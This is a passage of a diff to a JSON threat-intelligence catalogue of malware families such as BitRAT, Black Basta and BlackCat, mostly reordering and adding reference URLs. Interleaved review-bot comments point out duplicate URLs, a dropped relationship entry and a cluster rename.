- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html"
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
],
"synonyms": [],
"type": []
@@ -14397,15 +15302,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f1e05a12-ca50-41ab-a963-d7df5bcb141d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f98b4092-5f32-407c-9015-2da787d70c64",
"value": "Biscuit"
},
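Review bot: the Biscuit entry loses its entire `related` array, including the `similar` link to dest-uuid f1e05a12-ca50-41ab-a963-d7df5bcb141d tagged `estimative-language:likelihood-probability="almost-certain"`, and nothing in the hunk replaces it. If relationships are now produced by a separate step, the commit message should say so; otherwise this is a silent loss of a cross-cluster reference and the removal should be reverted.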
@@ -14414,11 +15310,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a",
- "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
"https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/",
- "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/"
+ "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
],
"synonyms": [],
"type": []
@@ -14432,8 +15328,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock",
"https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/",
- "https://twitter.com/malwrhunterteam/status/1215252402988822529",
- "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview"
+ "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview",
+ "https://twitter.com/malwrhunterteam/status/1215252402988822529"
],
"synonyms": [],
"type": []
@@ -14464,10 +15360,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat",
"https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
"https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
"https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
"https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan"
],
"synonyms": [],
@@ -14481,30 +15377,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
- "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
"https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/",
"https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/",
- "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
- "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://community.riskiq.com/article/ade260c6",
- "https://www.youtube.com/watch?v=CYm3g4zkQdw",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/",
"https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
- "https://asec.ahnlab.com/en/32781/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
"https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat",
- "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://community.riskiq.com/article/ade260c6",
"https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html"
+ "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
+ "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/",
+ "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/",
+ "https://asec.ahnlab.com/en/32781/",
+ "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
+ "https://www.youtube.com/watch?v=CYm3g4zkQdw",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [],
"type": []
@@ -14513,7 +15410,7 @@
"value": "BitRAT"
},
{
- "description": "",
+ "description": "Kaspersky Labs characterizes Bizarro as yet another banking Trojan family originating from Brazil that is now found in other regions of the world. They have seen users being targeted in Spain, Portugal, France and Italy. Attempts have now been made to steal credentials from customers of 70 banks from different European and South American countries. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro",
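Review bot: the new Bizarro description ends with a trailing space inside the string (`...South American countries. "`); trim it so the value survives a formatter pass unchanged. The text also reads as a paraphrase of a vendor report, so the matching securelist or kaspersky URL should be among the refs if it is not already further down this list.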
@@ -14545,23 +15442,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/",
"https://gbhackers.com/black-basta-ransomware/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://securelist.com/luna-black-basta-ransomware/106950",
- "https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla",
- "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html",
- "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/",
- "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
- "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://securelist.com/luna-black-basta-ransomware/106950",
"https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware"
+ "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
+ "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
+ "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/",
+ "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies",
+ "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware",
+ "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/",
+ "https://www.zscaler.com/blogs/security-research/back-black-basta",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html",
+ "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
+ "https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/",
+ "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
+ "https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/"
],
"synonyms": [
"no_name_software"
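Review bot: the Black Basta refs now carry the same Unit 42 article twice, once without and once with a trailing slash (`"https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware"` and `".../threat-assessment-black-basta-ransomware/"`); normalising trailing slashes before de-duplicating would drop one. The `securityscorecard.pathfactory.com/all/a-deep-dive-into-bla` entry also looks cut off and is worth checking against the source, given that the full `securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware` URL is already in the list.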
@@ -14569,31 +15477,33 @@
"type": []
},
"uuid": "ada47367-7e69-4122-b5c1-4e5aeb54f922",
- "value": "Black Basta"
+ "value": "Black Basta (Windows)"
},
{
"description": "Ransomware. Uses dropper written in JavaScript to deploy a .NET payload.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte",
- "https://www.ic3.gov/Media/News/2022/220211.pdf",
- "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants",
"https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html",
- "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html",
- "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
"https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
- "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure",
"https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte",
- "https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/",
- "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
+ "https://twitter.com/splinter_code/status/1628057204954652674",
+ "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants",
+ "https://redcanary.com/blog/blackbyte-ransomware/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
"https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://www.ic3.gov/Media/News/2022/220211.pdf",
+ "https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/",
+ "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html",
"https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace",
- "https://redcanary.com/blog/blackbyte-ransomware/"
+ "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure",
+ "https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/",
+ "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups"
],
"synonyms": [],
"type": []
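Review bot: renaming the cluster value from `"Black Basta"` to `"Black Basta (Windows)"` keeps uuid ada47367-7e69-4122-b5c1-4e5aeb54f922, so uuid-based references still resolve, but any tag or attribute that matches on the value string will no longer find this cluster. Add the previous name `Black Basta` to `synonyms` next to `no_name_software` so existing tags keep resolving, and call out the rename in the commit message.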
@@ -14606,46 +15516,57 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat",
- "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
- "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
- "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/",
- "https://blog.group-ib.com/blackcat",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://killingthebear.jorgetesta.tech/actors/alphv",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
- "https://unit42.paloaltonetworks.com/blackcat-ransomware/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/",
- "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf",
- "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html",
- "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
- "https://www.ic3.gov/Media/News/2022/220420.pdf",
- "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware",
"https://www.intrinsec.com/alphv-ransomware-gang-analysis",
- "https://www.varonis.com/blog/alphv-blackcat-ransomware",
- "https://securelist.com/a-bad-luck-blackcat/106254/",
- "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware",
+ "https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html",
+ "https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
+ "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
"https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware",
- "https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html",
- "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
+ "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/",
+ "https://www.varonis.com/blog/alphv-blackcat-ransomware",
+ "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/",
+ "https://securelist.com/a-bad-luck-blackcat/106254/",
+ "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/",
+ "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf",
+ "https://www.ic3.gov/Media/News/2022/220420.pdf",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html",
"https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/",
- "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
- "https://github.com/f0wl/blackCatConf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack",
"https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://unit42.paloaltonetworks.com/blackcat-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html",
+ "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware",
+ "https://blog.group-ib.com/blackcat",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://killingthebear.jorgetesta.tech/actors/alphv",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://github.com/f0wl/blackCatConf",
+ "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous"
],
"synonyms": [
"ALPHV",
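Review bot: two URLs appear twice in the BlackCat refs differing only by a trailing slash: `"https://www.intrinsec.com/alphv-ransomware-gang-analysis"` alongside `".../alphv-ransomware-gang-analysis/"`, and the Microsoft `ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself` post with and without the slash. The Microsoft pair already existed before this change and is simply re-added in a new position, so the de-duplication step is missing rather than newly broken; the same trailing-slash normalisation suggested for Black Basta fixes both.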
@@ -14661,19 +15582,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
"https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/",
- "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
- "https://www.youtube.com/watch?v=NFJqD-LcpIg",
- "https://attack.mitre.org/groups/G0001/",
- "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://attack.mitre.org/software/S0069/",
"https://attack.mitre.org/groups/G0096",
- "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://attack.mitre.org/groups/G0025/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.youtube.com/watch?v=NFJqD-LcpIg",
+ "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
+ "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://attack.mitre.org/software/S0069/",
+ "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://attack.mitre.org/groups/G0025/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
],
"synonyms": [
"PNGRAT",
@@ -14690,43 +15611,36 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
- "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://attack.mitre.org/groups/G0034",
- "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
"https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf",
- "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://securelist.com/black-ddos/36309/",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
+ "https://securelist.com/black-ddos/36309/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://attack.mitre.org/groups/G0034",
"http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf",
"https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
- "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
"https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
